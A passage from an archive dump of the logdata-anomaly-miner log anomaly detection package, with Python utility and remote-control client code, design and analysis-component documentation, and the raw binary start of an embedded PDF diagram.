of ancillary data instead of 1" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) cmsg_level, cmsg_type, cmsg_data = anc_data[0] if (cmsg_level != socket.SOL_SOCKET) or (cmsg_type != socket.SCM_RIGHTS): msg = 'Received invalid message from remote side' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Do not accept multiple or unaligned FDs. if len(cmsg_data) != 4: msg = f"Unsupported control message length {len(cmsg_data)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) received_fd = struct.unpack('i', cmsg_data)[0] split_pos = message_data.find(b'\x00') if split_pos < 0: msg = 'No null byte in received message' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) type_info = message_data[:split_pos] annotation_data = message_data[split_pos + 1:] if received_fd <= 2: msg = f'received "reserved" fd {received_fd}' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) if isinstance(type_info, str): type_info = type_info.encode() if isinstance(annotation_data, str): annotation_data = annotation_data.encode() return received_fd, type_info, annotation_data logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util/StringUtil.py000066400000000000000000000071351437606560100326500ustar00rootroot00000000000000""" Some useful string-functions. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging import sys import os from aminer.AminerConfig import DEBUG_LOG_NAME colflame = ("\033[31m" " * ( ) ( \n" " ( ( ` )\\ ) ( /( )\\ ) \n" " )\\ )\\))( (()/( )\\()) ( (()/( \n" "\033[33m" "((((_)( ((_)()\\ /(_))(_)\\ )\\ /(_)) \n" " )\\ _ )\\(_()((_)(_)) _((_)((_) (_)) \n" " (_)\033[39m_\\\033[33m()\033[39m| \\/ ||_ _|| \\| || __|| _ \\ \n" " / _ \\ | |\\/| | | | | .` || _| | / \n" " /_/ \\_\\|_| |_||___||_|\\_||___||_|_\\ " "\033[39m") flame = (" * ( ) ( \n" " ( ( ` )\\ ) ( /( )\\ ) \n" " )\\ )\\))( (()/( )\\()) ( (()/( \n" "((((_)( ((_)()\\ /(_))(_)\\ )\\ /(_)) \n" " )\\ _ )\\(_()((_)(_)) _((_)((_) (_)) \n" " (_)_\\()| \\/ ||_ _|| \\| || __|| _ \\ \n" " / _ \\ | |\\/| | | | | .` || _| | / \n" " /_/ \\_\\|_| |_||___||_|\\_||___||_|_\\ ") def supports_color(): """ Return True if the running system's terminal supports color, and False otherwise. The function was borrowed from the django-project (https://github.com/django/django/blob/master/django/core/management/color.py) """ plat = sys.platform supported_platform = plat != 'Pocket PC' and (plat != 'win32' or 'ANSICON' in os.environ) # isatty is not always implemented, #6223. is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty() return supported_platform and is_a_tty def decode_string_as_byte_string(string): """ Decode a string produced by the encode function encodeByteStringAsString(byteString) below. @return string. """ decoded = b'' count = 0 while count < len(string): if string[count] in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!"#$&\'()*+,-./:;<=>?@[]\\^_`{}|~ ': decoded += bytes(string[count], 'ascii') count += 1 elif string[count] == '%': decoded += bytearray((int(string[count + 1:count + 3], 16),)) count += 3 else: msg = 'Invalid encoded character' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) return decoded def encode_byte_string_as_string(byte_string): r""" Encode an arbitrary byte string to a string. This is achieved by replacing all non ascii-7 bytes and all non printable ascii-7 bytes and % character by replacing with their escape sequence %[hex]. For example byte string b'/\xc3' is encoded to '/%c3' @return a string with decoded name. """ encoded = '' for byte in byte_string: if byte in b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!"#$&\'()*+,-./:;<=>?@[]\\^_`{}|~ ': encoded += chr(byte) else: encoded += '%%%02x' % byte # skipcq: PYL-C0209 return encoded TimeTriggeredComponentInterface.py000066400000000000000000000050521437606560100367200ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/util""" This is the interface-class for the TimeTriggeredComponent. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import abc class TimeTriggeredComponentInterface(metaclass=abc.ABCMeta): """ This is the common interface of all components that can be registered to receive timer interrupts. There might be different timelines for triggering, real time and normalized log data time scale for forensic analysis. For forensic analyis different timers might be available to register a component. Therefore the component should state, which type of triggering it would require. """ @property @abc.abstractmethod def time_trigger_class(self): raise NotImplementedError def get_time_trigger_class(self): """ Get the trigger class this component can be registered for. See AnalysisContext class for different trigger classes available. """ if self.time_trigger_class not in (1, 2): raise NotImplementedError("The self.time_trigger_class property must be set to AnalysisContext.TIME_TRIGGER_CLASS_REALTIME or " "AnalysisContext.TIME_TRIGGER_CLASS_ANALYSISTIME.") return self.time_trigger_class @abc.abstractmethod def do_timer(self, trigger_time): """ Perform trigger actions and to determine the time for next invocation. The caller may decide to invoke this method earlier than requested during the previous call. Classes implementing this method have to handle such cases. Each class should try to limit the time spent in this method as it might delay trigger signals to other components. For extensive compuational work or IO, a separate thread should be used. @param trigger_time the time this trigger is invoked. This might be the current real time when invoked from real time timers or the forensic log timescale time value. @return the number of seconds when next invocation of this trigger is required. """ logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminerremotecontrol.py000077500000000000000000000115701437606560100324050ustar00rootroot00000000000000#!/usr/bin/python3 -BbbEIsSttW all # -*- coding: utf-8 -*- """ This tool allows to connect to a remote control socket, send requests and retrieve the responses. To allow remote use of this tool, e.g. via SSH forwarding, the remote control address can be set on the command line, no configuration is read. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import json import os import socket import traceback import sys import argparse # Get rid of the default sys path immediately. Otherwise Python also attempts to load the following imports from e.g. directory # where this binary resides. sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled'] from aminer.AnalysisChild import AnalysisChildRemoteControlHandler # skipcq: FLK-E402 from aminer.util.StringUtil import colflame, flame, supports_color # skipcq: FLK-E402 from metadata import __version_string__ # skipcq: FLK-E402 help_message = 'aminerremotecontrol\n' if supports_color(): help_message += colflame else: help_message += flame help_message += 'For further information read the man pages running "man aminerRemoteControl".' parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-v', '--version', action='version', version=__version_string__) parser.add_argument('-c', '--control-socket', default='/var/run/aminer-remote.socket', type=str, help='when given, use nonstandard control socket') parser.add_argument('-d', '--data', help='provide this json serialized data within execution environment as "remote_control_data" (see man ' 'page).') parser.add_argument('-e', '--exec', action='append', type=str, help='add command to the execution list, can be used more than once.') parser.add_argument('-f', '--exec-file', type=str, help='add commands from file to the execution list in same way as if content would have ' 'been used with "--exec"') parser.add_argument('-s', '--string-response', action='store_true', help='if set, print the response just as string instead of passing it to repr') args = parser.parse_args() remote_control_socket_name = args.control_socket if args.data is not None: args.data = json.loads(args.data) remote_control_data = args.data command_list = args.exec if command_list is None: command_list = [] if args.exec_file is not None: if not os.path.exists(args.exec_file): print(f"File {args.exec_file} does not exist") sys.exit(1) with open(args.exec_file, 'rb') as exec_file: command_list += exec_file.readlines() string_response_flag = args.string_response if not command_list: print('No commands given, use --exec [cmd]') sys.exit(1) remote_control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) try: remote_control_socket.connect(remote_control_socket_name) except socket.error as connectException: print(f"Failed to connect to socket {remote_control_socket_name}, aminer might not be running or remote control is disabled in " f"configuration: {str(connectException)}") sys.exit(1) remote_control_socket.setblocking(True) control_handler = AnalysisChildRemoteControlHandler(remote_control_socket) for remote_control_code in command_list: control_handler.put_execute_request(remote_control_code, remote_control_data) # Send data until we are ready for receiving. while not control_handler.may_receive(): control_handler.do_send() while not control_handler.may_get(): control_handler.do_receive() request_data = control_handler.do_get() request_type = request_data[4:8] if request_type == b'RRRR': try: remote_data = json.loads(request_data[8:]) if remote_data[0] is not None: print(f"Remote execution exception:\n{remote_data[0]}") if string_response_flag: print(f"Remote execution response: {str(remote_data[1])}") else: print(f"Remote execution response: {repr(remote_data[1])}") except: # skipcq: FLK-E722 print(f"Failed to process response {repr(request_data)}") traceback.print_exc() else: raise Exception(f"Invalid request type {repr(request_type)}") remote_control_socket.close() logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/metadata.py000066400000000000000000000017171437606560100300740ustar00rootroot00000000000000__authors__ = ["Markus Wurzenberger", "Max Landauer", "Wolfgang Hotwagner", "Ernst Leierzopf", "Roman Fiedler", "Georg Hoeld", "Florian Skopik"] __contact__ = "aecid@ait.ac.at" __copyright__ = "Copyright 2023, AIT Austrian Institute of Technology GmbH" __date__ = "2023/01/20" __deprecated__ = False __email__ = "aecid@ait.ac.at" __website__ = "https://aecid.ait.ac.at" __license__ = "GPLv3" __maintainer__ = "Markus Wurzenberger" __status__ = "Production" __version__ = "2.6.1" _indentation = int(max(0, max(0, (29 - len(__version__)))) / 2) # skipcq: PYL-C0209 __version_string__ = """ (Austrian Institute of Technology)\n (%s)\n%sVersion: %s""" % ( __website__, " " * _indentation, __version__ + " " * _indentation) __all__ = ['__authors__', '__contact__', '__copyright__', '__date__', '__deprecated__', '__email__', '__website__', '__license__', '__maintainer__', '__status__', '__version__', '__version_string__'] del _indentation logdata-anomaly-miner-2.6.1/source/root/usr/share/000077500000000000000000000000001437606560100221075ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/000077500000000000000000000000001437606560100226545ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/000077500000000000000000000000001437606560100270355ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminer/000077500000000000000000000000001437606560100303105ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminer/Analysis.txt000066400000000000000000000242541437606560100326430ustar00rootroot00000000000000Preamble: ========= This document lists all analysis components, that are components that emit events to the reporting infrastructure on certain conditions. The components in the following list are annotated with short codes describing their properties to speed up search for suitable analysis component. Property codes: * (A)utoconfiguration: This component may learn from the input data and adapt itself to new inputs. * (F)iltering: This component just filters input and distributes it to other analysis components. * (H)ardwired: This component generates events by hard rules. This is the opposite to "statistical triggering". * (N)ondeterministic: This component may react differently to the same input in two runs. * (R)eporting: This component will generate analysis reports for evaluation by an analyst. Those components can be very useful in the configuration phase to understand the processed data better. * (S)tatistical triggering: This component uses statistical methods to trigger on unexpected data. Such components may miss relevant events or cause false-positives. List of components: * EnhancedNewMatchPathValueComboDetector (AH): Same as NewMatchPathValueComboDetector but also supporting value transformation and storage of extra data. * HistogramAnalysis.HistogramAnalysis (R): Create histogram reports for parsed values. * HistogramAnalysis.PathDependentHistogramAnalysis (R): Create path-dependent histogram reports. * MatchValueAverageChangeDetector (AS): Detect when average value of given parsed value changes over time. * AtomFilters.MatchValueFilter (F): Use value of parsed element to forward input data to other analyzers. * MatchValueStreamWriter (F): Forward selected input data e.g. as CSV list, to other compoments via stream, e.g. to perform analysis in another tool. * MissingMatchPathValueDetector (AH): Detect when values for a given path are not received for a longer timespan, e.g. a host, service or address stopped sending/reporting. * MissingMatchPathListValueDetector (AH): Like MissingMatchPathValueDetector but looking on more than one match path for key extraction. * NewMatchPathDetector (AH): Generate events when new parser pathes are found. * NewMatchPathValueComboDetector (AH): Same as NewMatchPathValueDetector but considers combination of values for list of data pathes, e.g. source IP, destination IP, destination port for link analysis. * NewMatchPathValueDetector (AH): Generate events when new parsed values are observed for a given path, e.g. new MAC addresses, user names, ... * TimeCorrelationDetector (ANR): Try to detect time correlations and report them. * TimeCorrelationViolationDetector.TimeCorrelationViolationDetector (H): Detect changes in time correlation on a given ruleset. * TimestampCorrectionFilters.SimpleMonotonicTimestampAdjust (F): Adjust decreasing timestamp of new records to the maximum observed so far to ensure monotony for other analysis components. * TimestampsUnsortedDetector.TimestampsUnsortedDetector (HR): This detector is useful to to detect algorithm malfunction or configuration errors, e.g. invalid timezone configuration. * AllowlistViolationDetector (FH): Check all inputs using ruleset and create events, forward input to other components. HistogramAnalysis.HistogramAnalysis: ==================================== This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", that calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating own subclasses from "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * Example: The following example creates a HistogramAnalysis using only the property "/model/line/time", binned on per-hour basis and sending a report every week: from aminer.analysis import HistogramAnalysis # Use a time-modulo binning function modulo_time_bin_definition=HistogramAnalysis.ModuloTimeBinDefinition( 3600*24, # Modulo values in seconds (1 day) 3600, # Division factor to get down to reporting unit (1h) 0, # Start of lowest bin 1, # Size of bin in reporting units 24, # Number of bins False) # Disable outlier bins, not possible with time modulo histogram_analysis=HistogramAnalysis.HistogramAnalysis( aminer_config, [('/model/line/time', modulo_time_bin_definition)], 3600*24*7, # Reporting interval (weekly) report_event_handlers, # Send report to those handlers reset_after_report_flag=True) # Zero counters after sending of report # Send the appropriate input feed to the component atom_filter.add_handler(histogram_analysis) HistogramAnalysis.PathDependentHistogramAnalysis: ================================================= This component creates a histogram for only a single input property, e.g. an IP address, but for each group of correlated match pathes. Assume there two pathes that include the input property but they separate after the property was found on the path. This might be for example the client IP address in ssh log atoms, where the parsing path may split depending if this was a log atom for a successful login, logout or some error. This analysis component will then create separate histograms, one for the path common to all atoms and one for each disjunct part of the subpathes found. The component uses the same binning functions as the standard HistogramAnalysis.HistogramAnalysis, see documentation there. * Example: # Perform path-dependent histogram analysis: from aminer.analysis import HistogramAnalysis # Use a time-modulo binning function modulo_time_bin_definition=HistogramAnalysis.ModuloTimeBinDefinition( 3600*24, # Modulo values in seconds (1 day) 3600, # Division factor to get down to reporting unit (1h) 0, # Start of lowest bin 1, # Size of bin in reporting units 24, # Number of bins False) # Disable outlier bins, not possible with time modulo path_dependent_histogram_analysis=HistogramAnalysis.PathDependentHistogramAnalysis( aminer_config, '/model/line/time', # The value properties to check modulo_time_bin_definition, 3600*24*7, # Reporting interval (weekly) report_event_handlers, # Send report to those handlers reset_after_report_flag=True) # Zero counters after sending of report # Send the appropriate input feed to the component atom_filter.add_handler(path_dependent_histogram_analysis) AllowlistViolationDetector: =========================== This detector manages a list of allowlist rules to filter parsed atoms. All atoms not hit by any allowlist rule will cause events to be generated. When an atom is matched by a rule, it will be regarded as allowlisted by default but there is also an option to call user-defined functions on a matching rule via MatchAction elements, e.g. to forward the atom to another analyzer in one pass. Predefined actions are: * EventGenerationMatchAction: Generate events, when a rule matches, e.g. to report interesting matches, violations or for debugging. * AtomFilterMatchAction: Filter out the parsed atoms on match and forward it to other handlers, e.g. analysis components. * Rules: The ruleset of this detector is created from classes defined in aminer.analysis.Rules. See below for short list of supported rules or source for full documentation: * AndMatchRule: match only if all subrules match * DebugMatchRule: print debugging text when matching * DebugHistoryMatchRule: keep history of matched LogAtoms * IPv4InRFC1918MatchRule: match IPs in private networks * ModuloTimeMatchRule: match cyclic time values, e.g. nighttime * NegationMatchRule: match only if other rule did not * OrMatchRule: match if any subrule matches * ParallelMatchRule: match if any subrule matches but do not stop at first successful match * PathExistsMatchRule: match if parsed data contains given path * StringRegexMatchRule: match if parsed data string matches given regular expression. If applicable, Value[X]MatchRule should be used instead. * ValueDependentDelegatedMatchRule: select match rules according to values from parsed data * ValueDependentModuloTimeMatchRule: like ModuloTimeMatchRule but select limits according to values from parsed data * ValueListMatchRule: match if value is in given lookup list * ValueMatchRule: match if parsed data contains specific value * ValueRangeMatchRule: match if parsed data value is within given range * Example: # Run a allowlisting over the parsed lines. from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector violation_action=Rules.EventGenerationMatchAction('Analysis.GenericViolation', 'Violation detected', anomaly_event_handlers) allowlist_rules=[] # Filter out things so bad, that we do not want to accept the # risk, that a too broad allowlisting rule will accept the data # later on. allowlist_rules.append(Rules.ValueMatchRule('/model/services/cron/msgtype/exec/user', 'hacker', violation_action)) # Ignore Exim queue run start/stop messages allowlist_rules.append(Rules.PathExistsMatchRule('/model/services/exim/msg/queue/pid')) # Add a debugging rule in the middle to see everything not allowlisted # up to this point. allowlist_rules.append(Rules.DebugMatchRule(False)) # Ignore hourly cronjobs, but only when started at expected time # and duration is not too long. allowlist_rules.append(Rules.AndMatchRule([ Rules.ValueMatchRule('/model/services/cron/msgtype/exec/command', '( cd / && run-parts --report /etc/cron.hourly)'), Rules.ModuloTimeMatchRule('/model/syslog/time', 3600, 17*60, 17*60+5)])) atom_filter.add_handler(AllowlistViolationDetector(allowlist_rules, anomaly_event_handlers)) logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminer/Design.txt000066400000000000000000000200101437606560100322530ustar00rootroot00000000000000Preamble: ========= This document describes the requirement, design and implementation of aminer. For using it, the general "README.md" may suit your needs better than this document. Requirements: ============= * IO-Event triggered stream processing of messages to avoid CPU peaks and allow timely generation of alerts. * Sensible alerting model, e.g. sending of aggregated report 10sec after first anomaly, then have gracetime of 5min. When more events occurred, send another report and double grace time. * Have "environment" flags, e.g. maintenance mode to reduce messages under known procedures. Example: rsyslog should only restart during daily cronjobs, but at any time during maintenance. Design: ======= * Configuration layout: The behaviour of aminer is controlled by 3 different configuration data sources: * config.py: This configuration file is used by the privileged parent process for startup and launching of child process. To avoid parsing and loading larger amounts of configuration into a privileged process, this configuration may contain only the minimal set of parameters required by the parent process. * analysis.py: This (optional) configuration file contains the whole analysis child configuration (code). When missing those configuration parameters are also taken from the main config. * /var/lib/aminer: This directory is used for persistence of runtime data, e.g. learned patterns, statistical data, between different aminer invocations. * Loading of python code: aminer does not use the default dist/site-packages to load code. The rationale behind that is: * Avoid unused code to be loadable or even loaded by default: that code may only increase the attack surface or the memory footprint. * Reduce risk of side effects of unrelated updates: even when not good practices, some pyhton modules try to detect existence of other modules to adapt behaviour when available. This may cause unintended runtime changes when installing or updating completely unrelated python software. * Log file reading: Those problems have to be addressed when processing a continous stream of logging data from multiple sources: * High performance log reading conflicts with proper EOF detection: The select() call is useful to react to available data from sockets and pipes but will always include any descriptors for plain files, as they are always readable, even when at EOF. To detect availability of more data, inotify would have to be used. But while waiting, no socket change can be detected. Apart from that, unprivileged child may not access the directories containing the opened log file descriptors. * Log files may roll over: the service writing it or a helper program will move the file aside and switch to a newly created file. * Multiple file synchronization: When processing messages from two different log data sources to correlate them, care must be taken not to read newest messages only from one source and fall behind on the other source. Otherwise messages generated with quite different time stamps might be processed nearly at the same time while messages originating nearly at same timepoint might be separated. Solutions: * High performance log reading: No perfect solution possible. Therefore workaround similar to "tail -f" was choosen: Use select() on master/child communication socket also for sleeping between file descriptor read attempts. After timeout, handle the master/child communication (if any), then read each file until all of them did not supply any more data. Go to sleep again. * Roll over: Privileged process monitors if the file currently read has moved. When a move is detected, notify the child about the new file. This detection has to occur quite timely as otherwise the child process not knowing about the new file will continue processing and miss relevant correlated patterns due to reading only some of the currently relevant streams. FIXME: readlink best method? Inotify? * Roll over in child: The challenge is to completely read the old file before switching to the new one. Therefore the child relies on the notifications from the parent process to know about new files. When a new file is received, the old one is fstat'ed to known the maximum size of the file, then the remaining data is read before closing the old file descriptor. * Multiple file synchronization: Useful file synchronization requires basic understanding of reported timestamps which implies the need for parsing. Also timestamp correction should be performed before using the timestamp for synchronization, e.g. host clocks might drift away or logging may use wrong timezone. When processing multiple log data streams, all parsed log atoms will be reordered using the timestamp. One stream might not be read at all for some time, when an atom from that stream has timestamp larger than those from other streams. When reaching the end of input on all streams, marks on all reordering queues of unforwarded parsed log atoms are set. Everything before that mark will be forwared anyway after a configurable timespan. This should prevent bogus items from staying within the reordering queue forever due to timestamps far in future. * Input parsing: Fast input disecting is key for performant rule checks later on. Therefore the algorithm should have following properties: * Avoid passing over same data twice (as distinct regular expressions would do), instead allow a tree-like parsing structure, that will follow one parsing path for a given log-atom. * Make parsed parts quickly accessible so that rule checks can just pick out the data they need without searching the tree again. * Rule based distribution of parsed input to detectors: Implementation: =============== * aminer: This is the privileged master process having access to logfiles. It just launches the AminerAnalysisChild and forwards logfiles to it. * AminerAnalysisChild: This process runs without root capablities and just reads logfiles and stores state information in /var/lib/aminer. AminerAnalysisChild processes data in a multistage process. Each transformation step is configurable, components can be registered to receive output from one layer and create input for the next one. * aminer_config.build_analysis_pipeline: This function creates the pipeline for parsing the log data and hands over the list of RawAtom handlers (those who will receive new log-atoms) and a list of components needing timer interrupts. Thus the need for multithreaded operation or asynchronous timer events is eliminated. * TimeCorrelationDetector: This component attempts to perform following steps for each recieved log-atom: * Check which test rules match it. If no rule matched the data, keep it for reference when creating new rules next time. * When a match A was found, go through correlation table to check if any of the other matches has matched recently. If a recent match B had occured, update 2 counters, one assuming that A* (hidden internal event) caused B and then A, the other one that B* cause B and then A. * If maximum number of parallel check rules not reached yet, create a new random rule now using the current log-atom or the last unmatched one. * Perform correlation result accounting until at least some correlation counters reach values high enough. Otherwise discard features after some time or number of log atoms received when they did not reach sufficiently high counts: they may be unique features likely not being observed again. This detection algorithm has some weaknesses: * If match A is followed by multiple machtes of B, that will raise the correlation hypothesis for A*->A->B above the count of A. * For A*->A->B hypothesis, two As detected before the first B will increment count only once, the second pair is deemed non-correlated. logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminer/ParsingModel.txt000066400000000000000000000033701437606560100334400ustar00rootroot00000000000000Preamble: ========= Sorry, this part of the documentation was not written yet! Check the source code documentation headers from files in directory /usr/lib/logdata-anomaly-miner/aminer/parsing. Here is a short list of the most common model elements with short description: * AnyByteDataModelElement: Match anything till end of a log-atom. * Base64StringModelElement: Parse base64 strings as binary data. * DateTimeModelElement: Simple datetime parsing using python datetime module. See also MultiLocaleDateTimeModelElement * DebugModelElement: Output debugging information while parsing a log-atom * DecimalFloatValueModelElement: parsing of float values * DecimalIntegerValueModelElement: parsing of interger values * DelimitedDataModelElement: Same as AnyByteDataModelElement but include data only up to given delimiter string. * ElementValueBranchModelElement: conditional branching due to previously parsed values. * FirstMatchModelElement: Branch the model taking the first branch matching the remaining log-atom data. * FixedDataModelElement: Match a fixed (constant) string. * FixedWordlistDataModelElement: Match one of the fixed strings from a list. * HexStringModelElement: Match a hexadecimal string. * IpAddressDataModelElement: Match an IPv4 address. * MultiLocaleDateTimeModelElement: Parse datetime elements with leap year correction, multiple locale support. * OptionalMatchModelElement: Match subelements zero or one time. * RepeatedElementDataModelElement: Match subelements a given number of times. * SequenceModelElement: Match all the subelements exactly in the given order. * VariableByteDataModelElement: Match variable length data encoded within a given alphabet. * WhiteSpaceLimitedDataModelElement: Match string till next whitespace. logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminerremotecontrol/000077500000000000000000000000001437606560100331255ustar00rootroot00000000000000Readme.txt000066400000000000000000000006701437606560100350070ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminerremotecontrolThis document contains step by step instructions on what needs to be done to fully support a new Detector in the aminerRemoteControl. - add the Detector class to the exec_locals in the AnalysisChildRemoteControlHandler class. The format needs to be 'NewDetector':aminer.analysis.NewDetector. - if the class supports allowlisting events add it to the checks of the AminerRemoteControlExecutionMethods.allowlist_event_in_component method. logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/diagrams/000077500000000000000000000000001437606560100306245ustar00rootroot00000000000000activity_diagram.pdf000066400000000000000000002470451437606560100345740ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/diagrams%PDF-1.7 % 1 0 obj <>/Metadata 162 0 R/ViewerPreferences 163 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/Font<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 1087.5 818.25] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x=َVv Xiޝز=c9yO?iG}w}+Ш~k5t5o. .>k^B5~tѨV:ōK\=7(MSB(YOu  j]AuChB;mGhbDNg6Ci0# LJj uZ7-.a!tjHLgBj+Cf,kj17~?͘2eqtu5Cp?S]׼ \œ-~y%[Rek榽4nӴ&ny K7n^· jF?j/4Ś?oxt鷻9}Y,l^LՊ7o[C߮lP]Mt#VADݙXoqoⱴ0qXRpt|#Ղw]RaY.}p@[8U\Sk׵qg6V/N:Q)nQ(#\akŗ )ưyjH,eoVO37H` - 9P@ XE$)!tDXt2S[6+pe0@R Gg~;.<1<a:r_<;Dpm݀c]\R܏]x(eo ܒ[m6[czFp'~ -9rϠ^JP{޾]YQ遳{npD1ո8#IJ1$vD 6MQSqVc'1(ReXj[ۙ4X^\ve$c@bRq^TWw=u* @={g:o ]a3e0 smA ImO+`Wf|婭qWX[3'Z1 K9<Dz|C76 <%t@u_7-mNlZ!7=ǩK,Mm| "5F0=PtܶEyw$:w"=´=AD9^[b\Jʢ|. ,+; '^6"b,Ї-ҧ*֦B :4oj+Af,kj1\ yX*;xFĨUkk܏xQYR"[UuGX˰G0/zU$Z5fM#NP@pOidpIQ D@}{vz܂cH;"d Crw#"‹*)ԺG%HqO{Oe)Fptubd)d.^Bq0RL(-Ce0k Dž\55w=3#3Ls^8m1,;lpKp(PƤIǤC+iRkD&TrIc,Y~eЗ]Un='xv&Ȭ}NR04.Mvjb/NJ]#`@ջdtRxM0OL(~XsG:Mk3\ڤa.90GMDDOV qj z`YIUS 82gC!SqǞO/# 6aɫTŗhvmG ܴps?B&2ˁ5[:?7bG Mt\aխj\ꀠG|?h|'ȅEa {ȅ}2Lk0Ҙe8 A@Ã2ݠb5g q,C^Ԗˤ.as `R[ ȆX!h-ts)aUʪ y :tC@S^౽CZDE)5FEDQ!ʵjRVʸ>V$ҖUd*ʸ 2.aPV` AcdyS} eAv賅(] j%-xlW#pBd Ml % B%SSUPi0B&B6HJPP )TFXS[<鼗'aAs)Fe7D4ErF@ xʩ_ö#.,f781Sb%:na`ZUw{mVd 2&SEڀz _΋ kMT ؠf)<ڶT3[0d.416 u 4uϜl^ӱiNɜC[q K:#<]?-4|KE#.s' ]KbSމIi%fw+hmYvVuMj.yJȯa,Zh۞lfOWm,Vs5(n4=d0^oxs0JJqlwn}/evΚd|)&zd/0?n`֌V4*XH$3"I $l'!HBP`jRW  AEBDi QW ̃d`kj1ê쑛4c`B$zZ[I;*2>cAl7dCA]+w#:P`焴e<ʤUʹuB8 |D>9 P"? Q&:YE)/4s-OI3P+w싶TPTX%Q#lPK(qr #ABċ͞涜ܕKi0.w/# Ŕ #^Bgj0~Evs@jƆ}K"?11oxʍ3J{=_g/EpSyK̃G)vsW!9^ l%ɎSfեhW\3*4Bӱ ֜xBsALjY9eP+.*#tл㡞JěsFgm@tk7bYׄ‹(+" BDS !xjIȍ9!5 |e* (+9"V"`(+cMm<#?ʾsZzS]HǘSs9}⿐R.9c򶀢bMTrk|ÝOiAu sMY5}3T,q`l볺G,1֨,S_M?Z+sn?CsI eMact9U|IE{TPXMC9̫>I3Pvq@Ǹ+4ߢ02W1l+4>j DHLά7OXDvY#{O8>%]̉B\> {΂bB :YTn.`rg"#%C972恌ƙZ)LȘ~XZTP:P%AKU~~TL[5#ZD-.] =fGc~b!M2&f17Kֹw6S$k2btٸr7-Y 3"&yRoBG+oД_a08ȘS3/1"ҬCzOg`̏a83 0#06uL3u#0/jt( b2@aeApwpdsV^]LʟK(X3Y5H"qSb_f ֺa-j+Eku6SGO\iK$섭X3y{P,P]TQba!vEEBaIKhE:D D B"[ (8X$sι2{XMuhU]7Ǜ(0I Yi8}Hl+dtxt2|>Fe" mZc6M0yHF'Q)Y śWޡ%aktBU2{w8yW9H\*MGn^$"$"lz΂`~,TWVV٤~(hzdZX?gv=^l-n]8 2ߺWH;Q~ъY$w.\maֆs>#ԃ #_,tgHfgBXF6!}qlY`V0T35kQ&c|s.,.Eϥ͞?ι_JUE̽\*̾Fw6%f.vfZ@\HIqL˜”|2Eؒc)1j 2)Pz~lgU@iM.aj]۬Z ' ťyZ oT EqVv~jw"(y2K\pY):*tKbNOQp@{y>[9C]2(:N50#l솞tD e0RɈjSBJND8^tMn|^S&Mr gmsP=)Bvߙ91e$5'#9>vfV^>JU 1Ljf'%Y9) : J`˫GN[=R@Z|譐o!.| N%ʷvItb_-]@,}_UdJs'zp2ǽq7'+c?*ǚiH٥&yR)#Rb*8__sYCJdE=?%&+D֜YRWqW%E3Vkj1UC2s[q\ƃT,Gnues!aes%^l 